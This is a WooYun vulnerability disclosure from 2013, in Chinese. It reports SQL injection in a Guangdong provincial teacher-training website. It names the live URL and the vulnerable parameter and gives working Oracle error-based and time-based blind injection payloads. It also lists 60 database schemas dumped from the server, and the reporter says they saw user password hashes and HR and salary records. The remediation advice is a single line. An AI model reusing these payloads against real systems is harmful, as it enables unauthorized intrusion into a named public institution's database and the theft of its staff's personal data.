当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-029071

漏洞标题:广东省高等职业院校教师培训网SQL注射漏洞

相关厂商:广东省教育厅高等职业院校教师培训网

漏洞作者: 霍大然

提交时间:2013-07-16 14:18

修复时间:2013-08-30 14:19

公开时间:2013-08-30 14:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

广东省高等职业院校教师网隶属广东省教育厅主办,该注射漏洞涉及多个平台培训平台,包括中职、高职数据。出现大量用户名与密码,不过他们用的是二次md5加密,没解出来,没法进入后台。
数据库有点大,和其它平台在一个数据库,花了好多时间没看不明白,什么人力资源、工资信息都有。

详细说明:

http://gdgz.gdin.cn/searchResourceList.do?resourceName=aa
Place: GET
Parameter: resourceName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: resourceName=aa' AND 2444=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(104)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (2444=2444) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(107)||CHR(102)||CHR(58)||CHR(62))) FROM DUAL) AND 'Vvtl' LIKE 'Vvtl
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: resourceName=aa' AND 6446=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(71)||CHR(76)||CHR(111),5) AND 'obwp' LIKE 'obwp
---
available databases [60]:
[*] APEX_030200
[*] APPQOSSYS
[*] CJL
[*] CTXSYS
[*] CZH
[*] CZHDEMO
[*] DBSNMP
[*] DHX
[*] DHX_GDIN
[*] DYB
[*] ELAB
[*] EXFSYS
[*] FLOWS_FILES
[*] GDA
[*] GDZZSBXT
[*] GZGZ
[*] GZGZSBTEST
[*] GZGZTEST
[*] GZSBXT
[*] HJY
[*] HR
[*] HYJ
[*] IMLAB
[*] IX
[*] JAVA
[*] LAB
[*] LAB3
[*] LABTEST
[*] LBF
[*] LBFLAB
[*] LHB
[*] LJP
[*] LZC
[*] LZX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PHD
[*] PM
[*] SBXT
[*] SCOTT
[*] SH
[*] SSM2012
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] XJJ
[*] XSH
[*] YLJ
[*] YZJ
[*] ZBX
[*] ZGT
[*] ZJH
[*] ZZT

漏洞证明:

11.png


12.png

修复方案:

参数过滤、WEB应用防火墙

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝